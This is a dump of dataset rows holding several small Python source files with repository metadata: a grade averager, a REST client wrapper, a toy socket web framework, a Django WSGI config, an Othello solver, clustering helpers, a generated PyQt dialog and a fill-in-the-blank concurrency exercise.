20f822614fa0fa7de6ded3956fa8d40d589a4a86
|
d6c1fe886a3c27c82f03e5e4a6c670f0905d54e6
|
refs/heads/main
| 2023-08-23T17:42:32.063057
| 2021-10-25T10:32:03
| 2021-10-25T10:32:03
| 328,750,268
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 387
|
py
|
# Read N "name grade" pairs, group grades per student, then print each
# student's grades (two decimals) followed by their average.
total_lines = int(input())
grades_by_student = {}
for _ in range(total_lines):
    name, raw_grade = input().split()
    grades_by_student.setdefault(name, []).append(float(raw_grade))

for name, grades in grades_by_student.items():
    formatted = ' '.join(f'{grade:.2f}' for grade in grades)
    print(f"{name} -> {formatted} (avg: {sum(grades) / len(grades):.2f})")
|
[
"niki.dimov86@gmail.com"
] |
niki.dimov86@gmail.com
|
6735465791531aeeabc1ba1331fb80c55ae2c8f7
|
cd4676555fc1066b5a84320ebbb1d4623066380d
|
/crusoe_observe/flowmon-rest-client/flowmonclient/resources/ads/Filters.py
|
3bb92373672eb9ac13be90dde634a9a6f25fedd0
|
[
"MIT"
] |
permissive
|
wumingruiye/CRUSOE
|
3ca542fa5362caf404593acfc4b01eb8f9b4d5f4
|
73e4ac0ced6c3ac46d24ac5c3feb01a1e88bd36b
|
refs/heads/main
| 2023-07-01T21:40:09.538245
| 2021-08-05T14:07:03
| 2021-08-05T14:07:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 171
|
py
|
class Filters:
    """Thin wrapper around the ADS ``/filters`` REST resource."""

    def __init__(self, client):
        # HTTP client that performs the actual requests.
        self.client = client

    def all(self):
        """Return every filter known to the server (GET /filters)."""
        endpoint = "/filters"
        return self.client.get(endpoint)
|
[
"spaceks@ics.muni.cz"
] |
spaceks@ics.muni.cz
|
d6e677ac1447f8278ddff36b140132e55441832c
|
4abd8812b5e13906ef5b93397548e71655e7fde3
|
/WebFrame.py
|
3c049b2484390aba2807bb3f2fef1e7be2b6f50d
|
[] |
no_license
|
HMmelody/AID1808
|
6b06f09308c7b3ba7cb80367d4b4a2568bf93691
|
c8893e45f5496a5fbcdd1db43f88b0df53290e52
|
refs/heads/master
| 2020-04-04T18:17:20.444824
| 2018-11-06T03:55:22
| 2018-11-06T03:55:22
| 156,157,644
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,817
|
py
|
# coding=utf-8
'''
模拟框架程序部分
'''
from socket import *
from views import *
frame_ip = '127.0.0.1'
frame_port = 8080
frame_address = (frame_ip,frame_port)
# 静态网页位置
STATIC_DIR = './static'
# url决定我们能处理什么数据
urls = [('/time',show_time),('/hello',say_hello),('/bye',say_bye)]
# 应用类,将功能封装在类中
# Application class: the framework's functionality wrapped in a class.
class Application(object):
    """Socket-based demo web framework: serves static pages and url-mapped data.

    NOTE(review): a request is read as two separate recv() calls (method,
    then path), which assumes the peer sends them as two distinct messages —
    confirm against the companion client/server half of this exercise.
    """

    def __init__(self):
        # Listening socket with address reuse so quick restarts don't fail to bind.
        self.sockfd = socket()
        self.sockfd.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
        self.sockfd.bind(frame_address)

    def start(self):
        """Accept connections forever, handling one request per connection."""
        self.sockfd.listen(5)
        print("Listen the port 8080")
        while True:
            connfd, addr = self.sockfd.accept()
            method = connfd.recv(128).decode()
            path_info = connfd.recv(1024).decode()
            self.handle(connfd, method, path_info)

    def handle(self, connfd, method, path_info):
        """Dispatch one request: static page for '/' or '*.html', else a data view.

        NOTE(review): for POST (or any non-GET method) ``response`` is never
        assigned, so connfd.send() below raises NameError — confirm intended.
        """
        if method == 'GET':
            if path_info == '/' or path_info[-5:] == '.html':
                response = self.get_html(path_info)
            else:
                response = self.get_data(path_info)
        elif method == 'POST':
            pass
        connfd.send(response.encode())
        connfd.close()

    def get_html(self, path_info):
        """Read a static page from STATIC_DIR; '/' maps to index.html, missing files yield "404"."""
        if path_info == '/':
            get_file = STATIC_DIR + '/index.html'
        else:
            get_file = STATIC_DIR + path_info
        try:
            fd = open(get_file)
        except IOError:
            response = "404"
        else:
            response = fd.read()
        finally:
            return response

    def get_data(self, path_info):
        """Call the view function mapped to path_info in ``urls``; '404' if unmapped."""
        for url, func in urls:
            if path_info == url:
                return func()
        return '404'
if __name__ == '__main__':
    app = Application()
    app.start()  # start the framework application
|
[
"tarena@tedu.cn"
] |
tarena@tedu.cn
|
3fb2b2cb9ec1a2718bd91fb9ee318afc55f997c6
|
51d46cf862654d30f5fa0ee35a9243c9661fc0eb
|
/User_/user_custom/user_custom/wsgi.py
|
c4912256bea59c34b54c8253916ca4ef2ffa19cc
|
[] |
no_license
|
LikeLionCBNU/HamDongHo
|
6762a8db487ae2807d1ce9d4d2df7e18d67eab70
|
082cea62cf4b5136309cbddc8c09e4e84f25de7c
|
refs/heads/master
| 2022-12-06T22:48:17.500207
| 2020-08-19T14:31:32
| 2020-08-19T14:31:32
| 256,194,835
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 399
|
py
|
"""
WSGI config for user_custom project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Default to the project settings module unless the environment overrides it.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'user_custom.settings')
application = get_wsgi_application()
|
[
"ii8858@naver.com"
] |
ii8858@naver.com
|
f98ec6b74f00596af6fcf03d9e58cc0dd42de5a5
|
296756045df29db632141dda85034fca35213c92
|
/D3_4615_재미있는오셸로게임.py
|
23a924a8a5dd7ae3b09b95e5d7b3b37e34338aa0
|
[] |
no_license
|
dabini/SWEA
|
8b1b321a2126a41f0786e7212eb81ea0204716b6
|
4b61d34a4b089699a5594b4c43781a6f1dd2235e
|
refs/heads/master
| 2022-12-24T02:36:01.169672
| 2020-09-27T11:56:13
| 2020-09-27T11:56:13
| 236,012,382
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,511
|
py
|
T = int(input())
for t in range(T):
    # N: board side length, M: number of moves the players make.
    N, M = map(int, input().split())
    # 1-based board; 0 = empty, 1 = black stone, 2 = white stone.
    field = [[0]*(N+1) for _ in range(N+1)]
    for j in range(N//2, N//2+2):  # standard four-stone opening setup
        for i in range(N//2, N//2+2):
            if i == j:  # colour 1 is black, 2 is white
                field[j][i] = 2
            else:
                field[j][i] = 1
    # Eight directions, diagonals included.
    dx = [1, -1, 0, 0, 1, -1, 1, -1]
    dy = [0, 0, 1, -1, 1, -1, -1, 1]
    for m in range(M):
        X, Y, color = map(int, input().split())
        field[Y][X] = color
        # In each direction, find the nearest same-coloured stone; if every
        # square between is occupied, flip that run to ``color``.
        for d in range(8):
            check = True
            for k in range(1, N):
                if 1 <= Y+(dy[d]*k) < N+1 and 1 <= X+(dx[d]*k) < N+1 and field[Y+(dy[d]*k)][X+(dx[d]*k)] == color:
                    for f in range(1, k):
                        if field[Y+dy[d]*f][X+dx[d]*f] == 0:
                            check = False
                            break
                    if check == False:
                        break
                    if check:
                        for f in range(1, k):
                            field[Y+dy[d]*f][X+dx[d]*f] = color
                        break
    # Tally the final stone counts.
    Bcnt = 0
    Wcnt = 0
    for l in range(1, N+1):
        for q in range(1, N+1):
            if field[l][q] == 1:  # black stone
                Bcnt += 1
            elif field[l][q] == 2:  # white stone
                Wcnt += 1
    print("#{} {} {}".format(t+1, Bcnt, Wcnt))
|
[
"jdb960211@gmail.com"
] |
jdb960211@gmail.com
|
ec46f3d025b4c8f9a1a28ec7a4e09265e6806c5f
|
1b3c73cfd2c183861942d821b5f7b87cfde05687
|
/Clustering.py
|
ebee8512112a8b6ef2bf9157214257ebbb50b688
|
[] |
no_license
|
Cheereus/MathModel2020
|
d0e77d199701fe752298d3998578be58409c9ce3
|
752811a5550ff3d6ec4dc21f4880986e3fcf08f7
|
refs/heads/master
| 2023-04-27T15:00:28.332328
| 2021-04-27T02:56:52
| 2021-04-27T02:56:52
| 296,013,678
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 884
|
py
|
import numpy as np
from sklearn.cluster import KMeans, AgglomerativeClustering
from sklearn.neighbors import KNeighborsClassifier
from scipy.cluster.hierarchy import dendrogram, linkage, fcluster
import matplotlib.pyplot as plt
def k_means(X, k):
    """Cluster X into k groups with k-means++ initialisation.

    Returns the fitted cluster label for each sample as a plain list.
    NOTE: the original passed n_jobs=-1, which was deprecated in
    scikit-learn 0.23 and removed in 1.0 — KMeans(n_jobs=...) raises
    TypeError on current releases.  Dropping it keeps the call working
    without changing the clustering result.
    """
    k_m_model = KMeans(n_clusters=k, max_iter=300, n_init=40, init='k-means++')
    k_m_model.fit(X)
    return k_m_model.labels_.tolist()
def knn(X, y, k):
    """Fit and return a k-nearest-neighbours classifier on (X, y)."""
    # sklearn estimators return self from fit(), so the chained call is
    # equivalent to fit-then-return.
    return KNeighborsClassifier(n_neighbors=k).fit(X, y)
def hca(X, k=None):
    """Build a Ward-linkage hierarchical clustering model for X.

    ``k`` is accepted for interface symmetry with the other helpers but unused.
    """
    return linkage(X, 'ward')
# Dendrogram plot for an hca() linkage model (opens a matplotlib window).
def hca_dendrogram(model):
    """Render *model* as a wide dendrogram with rotated leaf labels."""
    plt.figure(figsize=(50, 10))
    dendrogram(model, leaf_rotation=90., leaf_font_size=8)
    plt.show()
# labels of hca
def hca_labels(model, n_clusters):
labels = fcluster(model, n_clusters, criterion='maxclust')
return labels
|
[
"fanwei1995@hotmail.com"
] |
fanwei1995@hotmail.com
|
425fec3232c22560f10257179343fe677eb7810a
|
94f304cb4c2ac2ad6ff1ee39725f46254c8838bc
|
/core/info/Ui_script.py
|
39b68de152e2eba395e13f524ec2b484d241ef11
|
[] |
no_license
|
kmolLin/python3_solve_dynamic
|
105bd70edaa5014e0ad76a9a3c66e43dc0fa5ad7
|
18f56e6958dd1816dfb7c26f4857aa3b41de9312
|
refs/heads/master
| 2021-06-03T10:19:44.551240
| 2016-09-23T13:22:52
| 2016-09-23T13:22:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,391
|
py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/home/ahshoe/Desktop/Pyslvs/core/info/script.ui'
#
# Created by: PyQt5 UI code generator 5.7
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Info_Dialog(object):
    """pyuic5-generated UI for the Python-script info dialog.

    Per the generator header above, manual edits are lost on regeneration —
    change script.ui and re-run pyuic5 instead.
    """

    def setupUi(self, Info_Dialog):
        """Build the widget tree and wire signals onto *Info_Dialog*."""
        Info_Dialog.setObjectName("Info_Dialog")
        Info_Dialog.setEnabled(True)
        Info_Dialog.resize(408, 485)
        Info_Dialog.setMinimumSize(QtCore.QSize(246, 346))
        icon = QtGui.QIcon()
        icon.addPixmap(QtGui.QPixmap(":/icons/edges.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
        Info_Dialog.setWindowIcon(icon)
        Info_Dialog.setAutoFillBackground(True)
        Info_Dialog.setSizeGripEnabled(True)
        Info_Dialog.setModal(True)
        self.verticalLayout = QtWidgets.QVBoxLayout(Info_Dialog)
        self.verticalLayout.setObjectName("verticalLayout")
        # Top row: icon, stretch, Copy and Save-as buttons.
        self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
        self.horizontalLayout_2.setObjectName("horizontalLayout_2")
        self.label = QtWidgets.QLabel(Info_Dialog)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.label.sizePolicy().hasHeightForWidth())
        self.label.setSizePolicy(sizePolicy)
        self.label.setText("")
        self.label.setPixmap(QtGui.QPixmap(":/icons/main.png"))
        self.label.setObjectName("label")
        self.horizontalLayout_2.addWidget(self.label)
        spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout_2.addItem(spacerItem)
        self.copy = QtWidgets.QPushButton(Info_Dialog)
        self.copy.setContextMenuPolicy(QtCore.Qt.NoContextMenu)
        self.copy.setAutoDefault(False)
        self.copy.setObjectName("copy")
        self.horizontalLayout_2.addWidget(self.copy)
        self.save = QtWidgets.QPushButton(Info_Dialog)
        self.save.setAutoDefault(False)
        self.save.setObjectName("save")
        self.horizontalLayout_2.addWidget(self.save)
        self.verticalLayout.addLayout(self.horizontalLayout_2)
        # Read-only browser that displays the generated script text.
        self.script = QtWidgets.QTextBrowser(Info_Dialog)
        self.script.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAsNeeded)
        self.script.setObjectName("script")
        self.verticalLayout.addWidget(self.script)
        # Bottom row: stretch plus Close/Help button box.
        self.horizontalLayout = QtWidgets.QHBoxLayout()
        self.horizontalLayout.setObjectName("horizontalLayout")
        spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
        self.horizontalLayout.addItem(spacerItem1)
        self.buttonBox = QtWidgets.QDialogButtonBox(Info_Dialog)
        sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
        sizePolicy.setHorizontalStretch(0)
        sizePolicy.setVerticalStretch(0)
        sizePolicy.setHeightForWidth(self.buttonBox.sizePolicy().hasHeightForWidth())
        self.buttonBox.setSizePolicy(sizePolicy)
        self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
        self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Close|QtWidgets.QDialogButtonBox.Help)
        self.buttonBox.setObjectName("buttonBox")
        self.horizontalLayout.addWidget(self.buttonBox)
        self.verticalLayout.addLayout(self.horizontalLayout)

        self.retranslateUi(Info_Dialog)
        self.buttonBox.rejected.connect(Info_Dialog.reject)
        QtCore.QMetaObject.connectSlotsByName(Info_Dialog)

    def retranslateUi(self, Info_Dialog):
        """Apply translatable UI strings (called by setupUi)."""
        _translate = QtCore.QCoreApplication.translate
        Info_Dialog.setWindowTitle(_translate("Info_Dialog", "Python Script"))
        self.label.setWhatsThis(_translate("Info_Dialog", "Pyslvs Icon!"))
        self.copy.setText(_translate("Info_Dialog", "Copy"))
        self.save.setText(_translate("Info_Dialog", "Save as..."))
        self.buttonBox.setWhatsThis(_translate("Info_Dialog", "Click to exit"))
import icons_rc
if __name__ == "__main__":
    # Manual smoke test: show the dialog standalone.
    import sys
    app = QtWidgets.QApplication(sys.argv)
    Info_Dialog = QtWidgets.QDialog()
    ui = Ui_Info_Dialog()
    ui.setupUi(Info_Dialog)
    Info_Dialog.show()
    sys.exit(app.exec_())
|
[
"smpss91341@gmail.com"
] |
smpss91341@gmail.com
|
21c56687f092c048fd987093b694fa1b9cdba953
|
e23a4f57ce5474d468258e5e63b9e23fb6011188
|
/110_concurrency_parallelism/_exercises/templates/Mastering Concurrency in Python/Chapter10/example3.py
|
22936bfe66daaa8030fb20b3750380ec1e244ec1
|
[] |
no_license
|
syurskyi/Python_Topics
|
52851ecce000cb751a3b986408efe32f0b4c0835
|
be331826b490b73f0a176e6abed86ef68ff2dd2b
|
refs/heads/master
| 2023-06-08T19:29:16.214395
| 2023-05-29T17:09:11
| 2023-05-29T17:09:11
| 220,583,118
| 3
| 2
| null | 2023-02-16T03:08:10
| 2019-11-09T02:58:47
|
Python
|
UTF-8
|
Python
| false
| false
| 698
|
py
|
# # ch9/example1.py
#
# ____ ma__ ______ sqrt
# ____ t_i_ ______ d_t_ __ timer
#
# ___ is_prime x
# print('Processing @...' ?
#
# __ ? < 2
# print('@ is not a prime number.' ?
#
# ____ ? __ 2
# print('@ is a prime number.' ?
#
# ____ ? % 2 __ 0
# print('@ is not a prime number.' ?
#
# ____
# limit _ __. sq.. ? + 1
# ___ i __ ra.. 3 ? 2
# __ ? % ? __ 0
# print('@ is not a prime number.' ?
# r_
#
# print('@ is a prime number.' ?
#
# __ _______ __ _______
#
# start _ ti..
# ? 9637529763296797)
# ? 427920331)
# ? 157)
# print('Took @.2_ seconds.' t.. - s..
|
[
"sergejyurskyj@yahoo.com"
] |
sergejyurskyj@yahoo.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.